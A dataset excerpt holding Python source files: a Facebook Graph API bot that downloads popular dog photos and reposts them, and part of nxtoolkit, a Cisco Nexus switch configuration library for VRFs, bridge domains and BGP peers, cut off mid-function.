metadata
dict | text
stringlengths 60
3.49M
|
---|---|
{
"source": "JonnyPugh/DogpostBot",
"score": 3
} |
#### File: DogpostBot/Project/download_photos.py
```python
from extensions import *
from requests import get
from urllib import urlretrieve
from dateutil import parser
from tzlocal import get_localzone
import os
downloads_log = open("downloads.log", "a+")
def get_request_json(url, extra_params):
request = get(url, params=get_request_params(extra_params))
request.raise_for_status()
return request.json()
def get_photo(photo_id, directory, reactions, time_last_checked):
# Get the reactions info of the picture to decide whether to download it
if get_request_json(graph_url+photo_id+"/reactions", {"summary": "total_count"})["summary"]["total_count"] > reactions:
# Get the picture url to download it
url = get_request_json(graph_url+photo_id, {"fields": "images"})["images"][0]["source"]
# Attempt to download the photo and if there
# are any problems, keep retrying
while True:
try:
urlretrieve(url, directory+photo_id+".jpg")
break
except:
write_to_log(downloads_log, "Error downloading photo: "+photo_id+", retrying...")
def loop_through_json(json, time_last_checked, function, arg2, arg3):
# Loop through all of the data in the json and call the specified function
while json["data"]:
for info in json["data"]:
if parser.parse(info["created_time"]) > time_last_checked.replace(tzinfo=get_localzone()):
function(info["id"], arg2, arg3, time_last_checked)
else:
break
if not "next" in json["paging"]:
break
json = get_request_json(json["paging"]["next"], {})
def get_page_images(page_id, source_id, reactions, time_last_checked):
# Create the directory to store the photos if it doesn't exist
directory = images_directory+source_id+"/"
if not os.path.exists(directory):
os.makedirs(directory)
# Go through all photos and download them if they match the criteria
loop_through_json(get_request_json(graph_url+page_id+"/photos", {"type": "uploaded"}), time_last_checked, get_photo, directory, reactions)
def get_group_images(group_id, time_last_checked):
# Go through all albums and download images
loop_through_json(get_request_json(graph_url+group_id+"/albums", {}), time_last_checked, get_page_images, group_id, 25)
def get_reactions_threshold(page_id):
# Use a threshold of 2% of the total likes on the page
return get_request_json(graph_url+page_id, {"fields": "fan_count"})["fan_count"] / 50
def main():
# Get new photos from the sources
for page in execute_query("select* from Sources"):
page_id = page["id"]
time_last_checked = page["time"]
page_type = page["type"]
if page_type == "page":
get_page_images(page_id, page_id, get_reactions_threshold(page_id), time_last_checked)
else:
get_group_images(page_id, time_last_checked)
execute_query("update Sources set time = current_timestamp where id = %s", (page_id,))
write_to_log(downloads_log, "Finished downloading new images from "+page_type+": "+page_id)
write_to_log(downloads_log, "Finished downloading new images from all sources")
if __name__ == "__main__":
try:
main()
except Exception as e:
write_to_log(downloads_log, "Unexpected error caught while downloading photos: "+str(e))
```
#### File: DogpostBot/Project/make_post.py
```python
from extensions import *
from random import choice
from sets import Set
from PIL import Image
from imagehash import average_hash
from requests import post
import os
error_log = open("error.log", "a+")
def main():
# Form a set of the hashes of all posted photos to check for duplicates
hashes = Set([post_info["hash"] for post_info in execute_query("select hash from Posts")])
# Choose an image to post
while True:
try:
# Choose a random source and image from that source
source = choice(os.listdir(images_directory))
source_directory = images_directory+source
files = os.listdir(source_directory)
if not files:
continue
filename = choice(files)
filepath = source_directory+"/"+filename
file_hash = str(average_hash(Image.open(filepath)))
if file_hash not in hashes:
break
write_to_log(error_log, "Deleting photo that has already been posted with hash: "+file_hash)
except:
write_to_log(error_log, "Deleting unopenable photo: "+filepath)
# Delete this photo if it is a duplicate of another
# one that has already been posted or if it is unopenable
os.remove(filepath)
# Post the photo, insert its data into the database, delete it, and log it
data = get_request_params({
"tags[]": [] if source == "no_source" else [{"tag_uid": source}]
})
files = {
"source": open(filepath, "rb")
}
r = post(graph_url+page_id+"/photos", data=data, files=files)
r.raise_for_status()
post_id = r.json()["id"]
execute_query("insert into Posts (hash, filename, source, id) values (%s, %s, %s, %s)", (file_hash, filename, "NULL" if source == "no_source" else source, post_id))
os.remove(filepath)
write_to_log(open("posts.log", "a+"), "Finished making post with id: "+post_id)
if __name__ == "__main__":
try:
main()
except Exception as e:
write_to_log(error_log, "Unexpected error caught while making a post: "+str(e))
``` |
{
"source": "jonnyrocks/nxtoolkit",
"score": 2
} |
#### File: nxtoolkit/nxtoolkit/nxtoolkit.py
```python
import sys
from .nxTable import Table
from .nxphysobject import *
from .nxbaseobject import BaseNXObject, BaseRelation, BaseInterface
from .nxsession import Session
from .nxtoolkitlib import Credentials
import logging
import json
import socket
def cmdline_login_to_apic(description=''):
# Take login credentials from the command line if provided
# Otherwise, take them from your environment variables file ~/.profile
creds = Credentials('apic', description)
args = creds.get()
# Login to Switch
session = Session(args.url, args.login, args.password)
resp = session.login()
if not resp.ok:
print('%% Could not login to Switch')
sys.exit(0)
return session
class Subnet(BaseNXObject):
""" Subnet : roughly equivalent to fvSubnet """
def __init__(self, subnet_name, parent=None):
"""
:param subnet_name: String containing the name of this Subnet instance
:param parent: An instance of BridgeDomain class representing the\
BridgeDomain which contains this Subnet.
"""
super(Subnet, self).__init__(subnet_name, parent)
self._addr = None
self._scope = None
@classmethod
def _get_switch_classes(cls):
"""
Get the Switch classes used by this nxtoolkit class.
:returns: list of strings containing Switch class names
"""
resp = []
resp.append('fvSubnet')
return resp
def get_addr(self):
"""
Get the subnet address
:returns: The subnet address as a string in the form of <ipaddr>/<mask>
"""
return self._addr
def set_addr(self, addr):
"""
Set the subnet address
:param addr: The subnet address as a string in the form\
of <ipaddr>/<mask>
"""
if addr is None:
raise TypeError('Address can not be set to None')
self._addr = addr
def get_scope(self):
"""
Get the subnet scope
:returns: The subnet scope as a string
"""
return self._scope
def set_scope(self, scope):
"""
Set the subnet address
:param scope: The subnet scope. It can be either "public", "private" or "shared".
"""
if scope is None:
raise TypeError('Scope can not be set to None')
self._scope = scope
def get_json(self):
"""
Returns json representation of the subnet
:returns: json dictionary of subnet
"""
attributes = self._generate_attributes()
if self.get_addr() is None:
raise ValueError('Subnet address is not set')
attributes['ip'] = self.get_addr()
if self.get_scope() is not None:
attributes['scope'] = self.get_scope()
return super(Subnet, self).get_json('fvSubnet', attributes=attributes)
def _populate_from_attributes(self, attributes):
"""
Sets the attributes when creating objects from the Switch.
Called from the base object when calling the classmethod get()
"""
self.set_addr(str(attributes.get('ip')))
@classmethod
def get(cls, session, bridgedomain, tenant):
"""
Gets all of the Subnets from the Switch for a particular tenant and
bridgedomain.
:param session: the instance of Session used for Switch communication
:param bridgedomain: the instance of BridgeDomain used to limit the\
Subnet instances retreived from the Switch
:param tenant: the instance of Tenant used to limit the Subnet\
instances retreived from the Switch
:returns: List of Subnet objects
"""
return BaseNXObject.get(session, cls, 'fvSubnet',
parent=bridgedomain, tenant=tenant)
class L3Inst(BaseNXObject):
""" L3Inst or VRF: roughly equivalent to ACI Context """
def __init__(self, l3inst_name, parent=None):
"""
:param l3inst_name: String containing the L3Inst name
:param parent: An instance of Tenant class representing the Tenant
which contains this L3Inst.
"""
super(L3Inst, self).__init__(l3inst_name, parent)
self.name = l3inst_name
self.adminState = 'admin-up'
self._children = []
@classmethod
def _get_switch_classes(cls):
"""
Get the Switch classes used by this nxtoolkit class.
:returns: list of strings containing Switch class names
"""
resp = []
resp.append('l3Inst')
return resp
@classmethod
def _get_toolkit_to_switch_classmap(cls):
"""
Gets the Nexus class to an nxtoolkit class mapping dictionary
:returns: dict of Switch class names to nxtoolkit classes
"""
return {}
@staticmethod
def _get_parent_class():
"""
Gets the class of the parent object
:returns: class of parent object
"""
return None
@staticmethod
def get_url(fmt='json'):
"""
Get the URL used to push the configuration to the Switch
if no format parameter is specified, the format will be 'json'
otherwise it will return '/api/mo/uni.' with the format string
appended.
:param fmt: optional format string, default is 'json'
:returns: URL string
"""
return '/api/mo/sys.' + fmt
@staticmethod
def _get_parent_dn(dn):
return dn.split('/ctx-')[0]
@staticmethod
def _get_name_from_dn(dn):
return dn.split('/ctx-')[1].split('/')[0]
@staticmethod
def _get_tenant_from_dn(dn):
"""
Get the tenant name from the DN
:param dn: String containing the DN
:return: string containing the tenant name
"""
return dn.split('/tn-')[1].split('/')[0]
def _populate_from_attributes(self, attributes):
"""
Sets the attributes when creating objects from the Switch.
Called from the base object when calling the classmethod get()
"""
self.descr = attributes.get('descr')
self.known_mcast = attributes.get('knwMcastAct')
self.modified_time = attributes.get('modTs')
self.name = attributes.get('name')
self.class_id = attributes.get('pcTag')
self.scope = attributes.get('scope')
self.vnid = attributes.get('seg')
dn = attributes.get('dn')
if dn is not None:
self.tenant = self._get_tenant_from_dn(dn)
else:
self.tenant = None
if attributes.get('pcEnfPref') == 'unenforced':
allow_all = True
else:
allow_all = False
self.set_allow_all(allow_all)
def get_json(self):
"""
Returns json representation of fvCtx object
:returns: json dictionary of fvCtx object
"""
attributes = self._generate_attributes()
return super(L3Inst, self).get_json(self._get_switch_classes()[0],
attributes=attributes)
@classmethod
def get(cls, session, tenant=None):
"""
Gets all of the L3Insts from the Switch.
:param session: the instance of Session used for Switch communication
:param tenant: the instance of Tenant used to limit the L3Insts\
retreived from the Switch
:returns: List of L3Inst objects
"""
return BaseNXObject.get(session, cls, cls._get_switch_classes()[0],
tenant, tenant)
@staticmethod
def get_table(l3insts, title=''):
"""
Will create table of l3inst information
:param title:
:param l3insts:
"""
headers = ['Tenant',
'L3Inst',
'VNID', 'Scope', 'Class ID',
'Allow All',
'Known MCST', 'Modified Time',
]
data = []
for l3inst in sorted(l3insts):
data.append([
l3inst.get_parent().name,
l3inst.name,
l3inst.vnid,
l3inst.scope,
l3inst.class_id,
l3inst.allow_all,
l3inst.known_mcast,
l3inst.modified_time
])
data = sorted(data)
table = Table(data, headers, title=title + 'L3Inst')
return [table, ]
class L2BD(BaseNXObject):
"""
L2BD: roughly equivalent to ACI BD
"""
def __init__(self, bd_name, parent=None):
"""
:param bd_name: String containing the name of this L2BD
object.
:param parent: An instance of Tenant class representing the Tenant
which contains this L2BD.
"""
super(L2BD, self).__init__(bd_name, parent)
self.adminSt = 'active'
self.operSt = 'Down'
self.fabEncap = bd_name
self.bd_name = bd_name
self.unkMacUcastAct = 'flood'
self.unkMcastAct = 'flood'
@classmethod
def _get_switch_classes(cls):
"""
Get the Switch classes used by this nxtoolkit class.
:returns: list of strings containing Switch class names
"""
resp = []
resp.append('l2BD')
return resp
@classmethod
def _get_toolkit_to_switch_classmap(cls):
"""
Gets the Switch class to an nxtoolkit class mapping dictionary
:returns: dict of Switch class names to nxtoolkit classes
"""
return {'fvSubnet': Subnet, }
@staticmethod
def _get_parent_class():
"""
Gets the class of the parent object
:returns: class of parent object
"""
return L3Inst
@staticmethod
def _get_parent_dn(dn):
return dn.split('/bd-')[0]
@staticmethod
def _get_name_from_dn(dn):
return dn.split('/bd-')[1].split('/')[0].split('[')[1].split(']')[0]
def set_unknown_mac_unicast(self, unicast):
"""
Set the unknown mac unicast for this BD
:param unicast: Unicast to assign this L2BD
"""
valid_unicast = ('flood')
if unicast not in valid_unicast:
raise ValueError('unknown MAC unicast must be of: %s or %s' % valid_unicast)
self.unkMacUcastAct = unicast
def get_unknown_mac_unicast(self):
"""
Gets the unknown mac unicast for this BD
:returns: unknown mac unicast of the L2BD
"""
return self.unkMacUcastAct
def set_unknown_multicast(self, multicast):
"""
Set the unknown multicast for this BD
:param multicast: Multicast to assign this L2BD
"""
valid_multicast = ('flood', 'opt-flood')
if multicast not in valid_multicast:
raise ValueError('unknown multicast must be of: %s or %s' % valid_multicast)
self.unkMcastAct = multicast
def get_unknown_multicast(self):
"""
Gets the unknown multicast for this BD
:returns: unknown multicast of the L2BD
"""
return self.unkMcastAct
def get_json(self):
"""
Returns json representation of the bridge domain
:returns: json dictionary of bridge domain
"""
children = []
attr = self._generate_attributes()
attr['unkMacUcastAct'] = self.unkMacUcastAct
attr['unkMcastAct'] = self.unkMcastAct
attr['adminSt'] = self.adminSt
attr['fabEncap'] = self.fabEncap
attr['id'] = self.bd_name.split('-')[1]
return super(L2BD, self).get_json(self._get_switch_classes()[0],
attributes=attr,
children=children)
def _extract_relationships(self, data):
vrf_children = data[0]['l3Inst']['children']
for child in vrf_children:
if 'l2BD' in child:
bd_name = child['l2BD']['attributes']['name']
if bd_name == self.name:
bd_children = child['l2BD']['children']
for bd_child in bd_children:
bd_name = self.name
break
super(L2BD, self)._extract_relationships(data)
# Subnet
def add_subnet(self, subnet):
"""
Add a subnet to this BD.
:param subnet: Instance of Subnet class to add to this L2BD.
"""
if not isinstance(subnet, Subnet):
raise TypeError('add_subnet requires a Subnet instance')
if subnet.get_addr() is None:
raise ValueError('Subnet address is not set')
if subnet in self.get_subnets():
return
self.add_child(subnet)
def remove_subnet(self, subnet):
"""
Remove a subnet from this BD
:param subnet: Instance of Subnet class to remove from this\
L2BD.
"""
if not isinstance(subnet, Subnet):
raise TypeError('remove_subnet requires a Subnet instance')
self.remove_child(subnet)
def get_subnets(self):
"""
Get all of the subnets on this BD.
:returns: List of Subnet instances assigned to this L2BD.
"""
resp = []
children = self.get_children()
for child in children:
if isinstance(child, Subnet):
resp.append(child)
return resp
def has_subnet(self, subnet):
"""
Check if the BD has this particular subnet.
:returns: True or False. True if this L2BD has this\
particular Subnet.
"""
if not isinstance(subnet, Subnet):
raise TypeError('has_subnet requires a Subnet instance')
if subnet.get_addr() is None:
raise ValueError('Subnet address is not set')
return self.has_child(subnet)
@classmethod
def get(cls, session):
"""
Gets all of the Bridge Domains from the Switch.
:param session: the instance of Session used for Switch communication
:returns: List of L2BD objects
"""
return BaseNXObject.get(session, cls, cls._get_switch_classes()[0])
def _get_url_extension(self):
return '/bd-[%s]' % self.name
def get_url(self, fmt='.json'):
# Default inst is used
return '/api/node/mo/sys/inst-default' + self._get_url_extension() + fmt
def _populate_from_attributes(self, attributes):
"""
Populates various attributes
:param attributes:
:return:
"""
self.class_id = attributes.get('pcTag')
self.bridgeMode = attributes.get('bridgeMode')
self.hw_id = attributes.get('hwId')
self.id = attributes.get('id')
self.adminSt = attributes.get('adminSt')
self.operSt = attributes.get('operSt')
self.unkMacUcastAct = attributes.get('unkMacUcastAct')
self.unkMcastAct = attributes.get('unkMcastAct')
self.modified_time = attributes.get('modTs')
@staticmethod
def get_table(bridge_domains, title=''):
"""
Will create table of l3inst information
:param title:
:param bridge_domains:
"""
headers = ['ID',
'HW ID',
'Admin',
'Oper',
'Subnets',
'Bridge Mode',
'Unknown UCST',
'Unknown MCST',
]
data = []
for bridge_domain in sorted(bridge_domains):
subnets = bridge_domain.get_subnets()
subnet_str = []
for subnet in subnets:
subnet_str.append(subnet.get_addr())
data.append([
bridge_domain.id,
bridge_domain.hwId,
bridge_domain.adminSt,
bridge_domain.operSt,
', '.join(subnet_str),
bridge_domain.bridgeMode,
bridge_domain.unkMacUcastAct,
bridge_domain.unkMcastAct,
])
data = sorted(data)
table = Table(data, headers, title=title + 'Bridge Domains')
return [table, ]
class ConfigBDs(BaseNXObject):
"""
This class is used to configure multiple bridges domains at a time
"""
def __init__(self, name=None):
if not name:
name = ""
super(ConfigBDs, self).__init__(name=name)
self.obj_name = 'bdEntity'
def add_l2bds(self, bd):
if not isinstance(bd, L2BD):
raise TypeError ('A L2BD instance required')
self._children.append(bd)
def get_url(self):
return '/api/node/mo/sys.json'
def get_json(self):
return super(ConfigBDs, self).get_json(self.obj_name)
class BGPPeerAF(BaseNXObject):
""" BGPPeerAF : roughly equivalent to bgpPeerAf """
def __init__(self, type, parent=None):
"""
:param subnet_name: String containing the name of this BGPPeer instance.
:param parent: An instance of BGPPeer class representing the\
BGPPeer which contains this BGPPeerAf.
"""
if not isinstance(parent, BGPPeer):
raise TypeError('Parent of BGPPeerAF class must be BGPPeer')
super(BGPPeerAF, self).__init__(type, parent)
self._type = type
@classmethod
def _get_switch_classes(cls):
"""
Get the Switch classes used by this nxtoolkit class.
:returns: list of strings containing Switch class names
"""
resp = []
resp.append('bgpPeerAf')
return resp
@staticmethod
def _get_parent_class():
"""
Gets the nxtoolkit class of the parent object
:returns: class of parent object
"""
return BGPPeer
@classmethod
def _get_toolkit_to_switch_classmap(cls):
"""
Gets the Switch class to an nxtoolkit class mapping dictionary
:returns: dict of Switch class names to nxtoolkit classes
"""
return {}
@classmethod
def _get_url_extension(self):
return '/af-%s' % self._af_type
def get_type(self):
"""
Get the bgpPeerAf type
:returns: The bgpPeerAf type as a string
"""
return self._type
def set_type(self, af_type):
"""
Set the bgpPeer type
:param type: The bgpPeerAf type as a string
"""
if af_type is None:
raise TypeError('AF Type can not be set to None')
valid_af_types = ['ipv4-ucast', 'l2vpn-evpn']
if af_type not in valid_af_types:
raise ValueError('AF type specified is not valid')
self._type = af_type
def get_json(self):
"""
Returns json representation of the bgpPeer
:returns: json dictionary of subnet
"""
attributes = self._generate_attributes()
if self.get_type() is None:
raise ValueError('BGPPeer AF is not set')
attributes['type'] = self.get_type()
return super(BGPPeerAF, self).get_json('bgpPeerAf', attributes=attributes)
def _populate_from_attributes(self, attributes):
"""
Sets the attributes when creating objects from the Switch.
Called from the base object when calling the classmethod get()
"""
self.set_type(str(attributes.get('type')))
@classmethod
def get(cls, session, bgppeer, tenant):
"""
Gets all of the BGPPeerAFs from the Switch for a particular BGPPeer
:param session: the instance of Session used for Switch communication
:param bgppeer: the instance of BGPPeer using the AF
:returns: List of BGPPeerAF objects
"""
return BaseNXObject.get(session, cls, 'bgpPeerAf', parent=bgppeer)
class BGPPeer(BaseNXObject):
""" BGPPeer : roughly equivalent to bgpPeer """
def __init__(self, addr, parent=None):
"""
:param subnet_name: String containing the name of this BGPPeer
instance.
:param parent: An instance of BGPDomain class representing the\
BGPDomain which contains this BGPPeer.
"""
#TBD: Validation of address
if not isinstance(parent, BGPDomain):
raise TypeError('Parent of BGPPeer class must be BGPDomain')
super(BGPPeer, self).__init__(addr, parent)
self._addr = addr
self._remote_as = None
self._adminSt = 'enabled'
self._src_if = None
@classmethod
def _get_switch_classes(cls):
"""
Get the Switch classes used by this nxtoolkit class.
:returns: list of strings containing Switch class names
"""
resp = []
resp.append('bgpPeer')
return resp
@staticmethod
def _get_parent_class():
"""
Gets the nxtoolkit class of the parent object
:returns: class of parent object
"""
return BGPDomain
@classmethod
def _get_toolkit_to_switch_classmap(cls):
"""
Gets the Switch class to an nxtoolkit class mapping dictionary
:returns: dict of Switch class names to nxtoolkit classes
"""
return {'bgpPeerAf': BGPPeerAF}
@staticmethod
def _get_url_extension(self):
return '/peer-[%s]' % self._addr
def get_addr(self):
"""
Get the bgpPeer address
:returns: The bgpPeer address as a string in the form of <ipaddr>/<mask>
"""
return self._addr
def set_addr(self, addr):
"""
Set the bgpPeer address
:param addr: The bgpPeer address as a string in the form\
of <ipaddr>/<mask>
"""
if addr is None:
raise TypeError('Address can not be set to None')
self._addr = addr
def get_remote_as(self):
"""
Get the bgpPeer remote-as
:returns: The bgpPeer remote-as as a string
"""
return self._remote_as
def set_remote_as(self, remote_as):
"""
Set the bgpPeer remote-as
:param remote-as: The bgpPeer remote-as.
"""
if remote_as is None:
raise TypeError('remote-as can not be set to None')
self._remote_as = remote_as
def get_src_if(self):
"""
Get the bgpPeer source interface
:returns: The bgpPeer source interface as a string
"""
return self._src_if
def set_src_if(self, src_if):
"""
Set the bgpPeer source interface
:param src_if: The bgpPeer source interface
"""
if src_if is None:
raise TypeError('src-if can not be set to None')
self._src_if = src_if
# AF
def add_af(self, af):
"""
Add a af to this BGP Peer.
:param af: Instance of BGPPeerAF class to add to this bgpInst.
"""
if not isinstance(af, BGPPeerAF):
raise TypeError('add_af requires a BGPPeerAF instance')
if af.get_type() is None:
raise ValueError('BGPPeerAF Type is not set')
if af in self.get_afs():
return
self.add_child(af)
def remove_af(self, af):
"""
Remove a af from this BGP Peer
:param af: Instance of BGPPeerAF class to remove from this\
bgpInst.
"""
if not isinstance(af, BGPPeerAF):
raise TypeError('remove_af requires a BGPPeerAF instance')
self.remove_child(af)
def get_afs(self):
"""
Get all of the afs on this BGP Peer.
:returns: List of BGPPeerAF instances assigned to this bgpInst.
"""
resp = []
children = self.get_children()
for child in children:
if isinstance(child, BGPPeerAF):
resp.append(child)
return resp
def has_af(self, af):
"""
Check if the BGP Peer has this particular af.
:returns: True or False. True if this bgpInst has this\
particular BGPPeerAF.
"""
if not isinstance(af, BGPPeerAF):
raise TypeError('has_af requires a BGPPeerAF instance')
if af.get_type() is None:
raise ValueError('BGPPeerAF type is not set')
return self.has_child(af)
def get_json(self):
"""
Returns json representation of the bgpPeer
:returns: json dictionary of subnet
"""
attributes = self._generate_attributes()
if self.get_addr() is None:
raise ValueError('BGPPeer address is not set')
attributes['addr'] = self.get_addr()
if self.get_remote_as() is not None:
attributes['asn'] = self.get_remote_as()
if self.get_src_if() is not None:
attributes['srcIf'] = self.get_src_if()
return super(BGPPeer, self).get_json('bgpPeer', attributes=attributes)
def _populate_from_attributes(self, attributes):
"""
Sets the attributes when creating objects from the Switch.
Called from the base object when calling the classmethod get()
"""
self.set_addr(str(attributes.get('addr')))
self.set_remote_as(str(attributes.get('asn')))
self.set_src_if(str(attributes.get('srcIf')))
@classmethod
def get(cls, session, bgpdomain):
"""
Gets all of the BGPPeers from the Switch for a particular BGPDomain
:param session: the instance of Session used for Switch communication
:param bgpdomain: the instance of BGPDomain used to limit the\
BGPPeer instances retreived from the Switch
:returns: List of BGPPeer objects
"""
return BaseNXObject.get_filtered(session, cls,
cls._get_switch_classes()[0], bgpdomain)
class BGPAdvPrefix(BaseNXObject):
""" BGPAdvPrefix : roughly equivalent to bgpAdvPrefix """
def __init__(self, addr, parent=None):
"""
:param addr: String containing the address of this Prefix
:param parent: An instance of BGPDomainAF class representing the\
BGPDomain Address Family which contains this prefix.
"""
#TBD: Validation of address
if not isinstance(parent, BGPDomainAF):
raise TypeError('Parent of BGPAdvPrefix class must be BGPDomainAF')
super(BGPAdvPrefix, self).__init__(addr, parent)
self._addr = addr
@classmethod
def _get_switch_classes(cls):
"""
Get the Switch classes used by this nxtoolkit class.
:returns: list of strings containing Switch class names
"""
resp = []
resp.append('bgpAdvPrefix')
return resp
@staticmethod
def _get_parent_class():
"""
Gets the nxtoolkit class of the parent object
:returns: class of parent object
"""
return BGPDomainAF
@classmethod
def _get_toolkit_to_switch_classmap(cls):
"""
Gets the Switch class to an nxtoolkit class mapping dictionary
:returns: dict of Switch class names to nxtoolkit classes
"""
return {}
@staticmethod
def _get_url_extension(self):
return '/prefix-[%s]' % self._addr
def get_addr(self):
"""
Get the bgpPeer address
:returns: The bgpPeer address as a string in the form of <ipaddr>/<mask>
"""
return self._addr
def set_addr(self, addr):
"""
Set the bgpPeer address
:param addr: The bgpPeer address as a string in the form\
of <ipaddr>/<mask>
"""
if addr is None:
raise TypeError('Address can not be set to None')
self._addr = addr
def get_json(self):
"""
Returns json representation of the bgpPeer
:returns: json dictionary of subnet
"""
attributes = self._generate_attributes()
if self.get_addr() is None:
raise ValueError('BGPAdvPrefix address is not set')
attributes['addr'] = self.get_addr()
return super(BGPAdvPrefix, self).get_json('bgpAdvPrefix', attributes=attributes)
def _generate_attributes(self):
attributes = {}
attributes['addr'] = self._addr
return attributes
def _populate_from_attributes(self, attributes):
"""
Sets the attributes when creating objects from the Switch.
Called from the base object when calling the classmethod get()
"""
self.set_addr(str(attributes.get('addr')))
@classmethod
def get(cls, session, bgpdomainaf):
"""
Gets all of the BGPAdvPrefix from the Switch for a particular BGPDomainAF
:param session: the instance of Session used for Switch communication
:param bgpdomainaf: the instance of BGPDomainAF used to limit the\
BGPAdvPrefix instances retreived from the Switch
:returns: List of BGPAdvPrefix objects
"""
return BaseNXObject.get(session, cls, 'bgpAdvPrefix', parent=bgpdomainaf)
class BGPDomainAF(BaseNXObject):
""" BGPDomainAF : roughly equivalent to bgpDomAf """
def __init__(self, af_type, parent=None):
"""
:param subnet_name: String containing the name of this BGPPeer
instance.
:param parent: An instance of BGPPeer class representing the\
BGPPeer which contains this BGPPeerAf.
"""
if not isinstance(parent, BGPDomain):
raise TypeError('Parent of BGPDomainAF class must be BGPDomain')
super(BGPDomainAF, self).__init__(af_type, parent)
self._type = af_type
@classmethod
def _get_switch_classes(cls):
"""
Get the Switch classes used by this nxtoolkit class.
:returns: list of strings containing Switch class names
"""
resp = []
resp.append('bgpDomAf')
return resp
@staticmethod
def _get_parent_class():
"""
Gets the nxtoolkit class of the parent object
:returns: class of parent object
"""
return BGPDomain
@classmethod
def _get_toolkit_to_switch_classmap(cls):
"""
Gets the Switch class to an nxtoolkit class mapping dictionary
:returns: dict of Switch class names to nxtoolkit classes
"""
return {'bgpAdvPrefix': BGPAdvPrefix}
@staticmethod
def _get_url_extension(self):
return '/af-%s' % self.name
def get_type(self):
"""
Get the bgpDomAf type
:returns: The bgpDomAf type as a string
"""
return self._type
def set_type(self, af_type):
"""
Set the bgpDomAf type
:param type: The bgpDomAf type as a string
"""
if af_type is None:
raise TypeError('AF Type can not be set to None')
valid_af_types = ['ipv4-ucast', 'l2vpn-evpn']
if af_type not in valid_af_types:
raise ValueError('AF type specified is not valid')
self._type = af_type
# BGPAdvPrefix
def add_adv_prefix(self, adv_prefix):
"""
Add a adv_prefix to this BGPDomainAF.
:param adv_prefix: Instance of BGPAdvPrefix class to add to this BGPDomainAF.
"""
if not isinstance(adv_prefix, BGPAdvPrefix):
raise TypeError('add_adv_prefix requires a BGPAdvPrefix instance')
if adv_prefix.get_addr() is None:
raise ValueError('BGPAdvPrefix address is not set')
if adv_prefix in self.get_adv_prefixs():
return
self.add_child(adv_prefix)
def remove_adv_prefix(self, adv_prefix):
"""
Remove a adv_prefix from this BGPDomainAF
:param adv_prefix: Instance of BGPAdvPrefix class to remove from this\
BGPDomainAF.
"""
if not isinstance(adv_prefix, BGPAdvPrefix):
raise TypeError('remove_adv_prefix requires a BGPAdvPrefix instance')
self.remove_child(adv_prefix)
def get_adv_prefixs(self):
"""
Get all of the adv_prefixs on this BGPDomainAF.
:returns: List of BGPAdvPrefix instances assigned to this BGPDomainAF.
"""
resp = []
children = self.get_children()
for child in children:
if isinstance(child, BGPAdvPrefix):
resp.append(child)
return resp
def has_adv_prefix(self, adv_prefix):
"""
Check if the BGPDomainAF has this particular adv_prefix.
:returns: True or False. True if this BGPDomainAF has this\
particular BGPAdvPrefix.
"""
if not isinstance(adv_prefix, BGPAdvPrefix):
raise TypeError('has_adv_prefix requires a BGPAdvPrefix instance')
if adv_prefix.get_addr() is None:
raise ValueError('BGPAdvPrefix address is not set')
return self.has_child(adv_prefix)
def get_json(self):
"""
Returns json representation of the bgpDomAf
:returns: json dictionary of adv_prefix
"""
attributes = self._generate_attributes()
if self.get_type() is None:
raise ValueError('BGPPeer AF is not set')
attributes['type'] = self.get_type()
return super(BGPDomainAF, self).get_json('bgpDomAf', attributes=attributes)
def _populate_from_attributes(self, attributes):
"""
Sets the attributes when creating objects from the Switch.
Called from the base object when calling the classmethod get()
"""
self.set_type(str(attributes.get('type')))
@classmethod
def get(cls, session, bgpdomain):
"""
Gets all of the BGPDomainAF from the Switch for a particular BGPDomain
:param session: the instance of Session used for Switch communication
:param bgpdomain: the instance of BGPDomain using the AF
:returns: List of BGPDomainAF objects
"""
return BaseNXObject.get_filtered(session, cls,
cls._get_switch_classes()[0], bgpdomain)
class BGPDomain(BaseNXObject):
"""
Creates an BGP router interface that can be attached to a L3 interface.
This interface defines the BGP AS, authentication, etc.
"""
def __init__(self, name, parent=None):
"""
:param name: String containing the name of this BGPDomain object.
:param as_num: String containing the IPv4 as_num
:param peer_ip: String containing the IP address of the BGP peer
Default is None.
:param node_id: String Containing the node-id (e.g. '101')
"""
super(BGPDomain, self).__init__(name, parent)
self._name = name
self.options = ''
self.networks = []
@staticmethod
def is_bgp():
"""
:returns: True if this interface is an BGP Session. In the case\
of BGPDomain instances, this is always True.
"""
return True
@classmethod
def _get_switch_classes(cls):
"""
Get the Switch classes used by this nxtoolkit class.
:returns: list of strings containing Switch class names
"""
resp = []
resp.append('bgpDom')
return resp
@classmethod
def _get_parent_class():
"""
Gets the nxtoolkit class of the parent object
:returns: class of parent object
"""
return BGPSession
@classmethod
def _get_toolkit_to_switch_classmap(cls):
"""
Gets the Switch class to an nxtoolkit class mapping dictionary
:returns: dict of Switch class names to nxtoolkit classes
"""
return {'bgpDomAf': BGPDomainAF,
'bgpPeer': BGPPeer}
@staticmethod
def _get_url_extension(self):
return '/dom-%s' % self._name
# Name
def get_name(self):
"""
Get the bgpDomain Name
:returns: The bgpDomain Name as a string
"""
return self._name
def set_name(self, name):
"""
Set the bgpDomain Name
:param as_num: The bgpDomain Name as a string
"""
if name is None:
raise TypeError('Name can not be set to None')
self._name = name
# Router ID
def get_router_id(self):
"""
Get the bgpPeer address
:returns: The bgpPeer address as a string in the form of <ipaddr>/<mask>
"""
return self._router_id
def set_router_id(self, addr):
"""
Set the bgpPeer address
:param addr: The bgpPeer address as a string in the form\
of <ipaddr>/<mask>
"""
if addr is None:
raise TypeError('Address can not be set to None')
self._router_id = addr
# Peer
def add_peer(self, peer):
"""
Add a peer to this BGP Domain.
:param peer: Instance of BGPPeer class to add to this bgpInst.
"""
if not isinstance(peer, BGPPeer):
raise TypeError('add_peer requires a BGPPeer instance')
if peer.get_addr() is None:
raise ValueError('BGPPeer address is not set')
if peer.get_remote_as() is None:
raise ValueError('BGPPeer remote-as is not set')
if peer in self.get_peers():
return
self.add_child(peer)
def remove_peer(self, peer):
"""
Remove a peer from this bgpInst
:param peer: Instance of BGPPeer class to remove from this\
bgpInst.
"""
if not isinstance(peer, BGPPeer):
raise TypeError('remove_peer requires a BGPPeer instance')
self.remove_child(peer)
def get_peers(self):
"""
Get all of the peers on this bgpInst.
:returns: List of BGPPeer instances assigned to this bgpInst.
"""
resp = []
children = self.get_children()
for child in children:
if isinstance(child, BGPPeer):
resp.append(child)
return resp
def has_peer(self, peer):
"""
Check if the bgpInst has this particular peer.
:returns: True or False. True if this bgpInst has this\
particular BGPPeer.
"""
if not isinstance(peer, BGPPeer):
raise TypeError('has_peer requires a BGPPeer instance')
if peer.get_addr() is None:
raise ValueError('BGPPeer address is not set')
